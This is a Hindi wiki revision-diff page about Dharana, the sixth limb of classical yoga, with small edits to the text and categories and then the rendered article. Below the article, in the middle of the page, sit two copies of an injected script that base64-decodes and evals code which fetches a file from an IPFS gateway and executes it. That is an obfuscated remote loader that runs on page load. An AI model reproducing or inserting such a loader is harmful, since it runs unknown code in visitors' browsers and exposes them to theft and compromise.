"धारणा" के अवतरणों में अंतर

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
('{{पुनरीक्षण}} *धारणा भारतीय दर्शन की योग पद्धति के आठ...' के साथ नया पन्ना बनाया)
 
छो (श्रेणी:दर्शन (को हटा दिया गया हैं।))
 
(एक अन्य सदस्य द्वारा किया गया बीच का एक अवतरण नहीं दर्शाया गया)
पंक्ति 1: पंक्ति 1:
{{पुनरीक्षण}}
+
'''धारणा''' भारतीय [[दर्शन]] की योग पद्धति के आठ अंगों अथवा सहायक गतिविधियों में से छठा, जो साधक को समाधि<ref>आत्म एकाग्रता</ref> की स्थिति प्राप्त करने की दिशा में सहायक होता है।  
*धारणा भारतीय [[दर्शन]] की योग पद्धति के आठ अंगों अथवा सहायक गतिविधियों में से छठा, जो साधक को समाधि<ref>आत्म एकाग्रता</ref> की स्थिती प्राप्त करने की दिशा में सहायक होता है।  
 
 
*धारणा में मस्तिक किसी एक बाहरी वस्तु पर ध्यान केंद्रित करता है।  
 
*धारणा में मस्तिक किसी एक बाहरी वस्तु पर ध्यान केंद्रित करता है।  
 
*धारणा की पर्याप्त लंबी अवधि से गहन या अधिक ध्यान केंद्रित करने की स्थिति, '''ध्यान''' उत्पन्न होती है, जिसमें ध्यानकर्ता और ध्यान की वस्तु के बीच एकात्म होने की प्रवृत्ति विकसित होती है।
 
*धारणा की पर्याप्त लंबी अवधि से गहन या अधिक ध्यान केंद्रित करने की स्थिति, '''ध्यान''' उत्पन्न होती है, जिसमें ध्यानकर्ता और ध्यान की वस्तु के बीच एकात्म होने की प्रवृत्ति विकसित होती है।
पंक्ति 13: पंक्ति 12:
 
[[Category:योग]]
 
[[Category:योग]]
 
[[Category:योग दर्शन]]
 
[[Category:योग दर्शन]]
[[Category:दर्शन]]
 
 
[[Category:दर्शन कोश]]
 
[[Category:दर्शन कोश]]
[[Category:नया पन्ना अक्टूबर-2011]]
+
 
  
 
__INDEX__
 
__INDEX__

11:00, 15 अक्टूबर 2011 के समय का अवतरण

धारणा भारतीय दर्शन की योग पद्धति के आठ अंगों अथवा सहायक गतिविधियों में से छठा, जो साधक को समाधि[1] की स्थिति प्राप्त करने की दिशा में सहायक होता है।

  • धारणा में मस्तिक किसी एक बाहरी वस्तु पर ध्यान केंद्रित करता है।
  • धारणा की पर्याप्त लंबी अवधि से गहन या अधिक ध्यान केंद्रित करने की स्थिति, ध्यान उत्पन्न होती है, जिसमें ध्यानकर्ता और ध्यान की वस्तु के बीच एकात्म होने की प्रवृत्ति विकसित होती है।
  • ये दोनों स्थितियाँ और समाधि की अंतिम स्थिती इतनी मिलती-जुलती है कि योग सिद्धांत में उल्लिखित अंतर की स्पष्ट जानकारी रखने वाले लोगो के अलावा किसी अन्य के द्वारा इनके बीच अंतर पाना कठिन है।[2]


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. आत्म एकाग्रता
  2. उदाहरणार्थ: बाहरी वस्तु, आंतरिक वस्तु और मानसिक स्थिती, अर्द्ध चेतना प्रतीतियाँ आदि

बाहरी कड़ियाँ

संबंधित लेख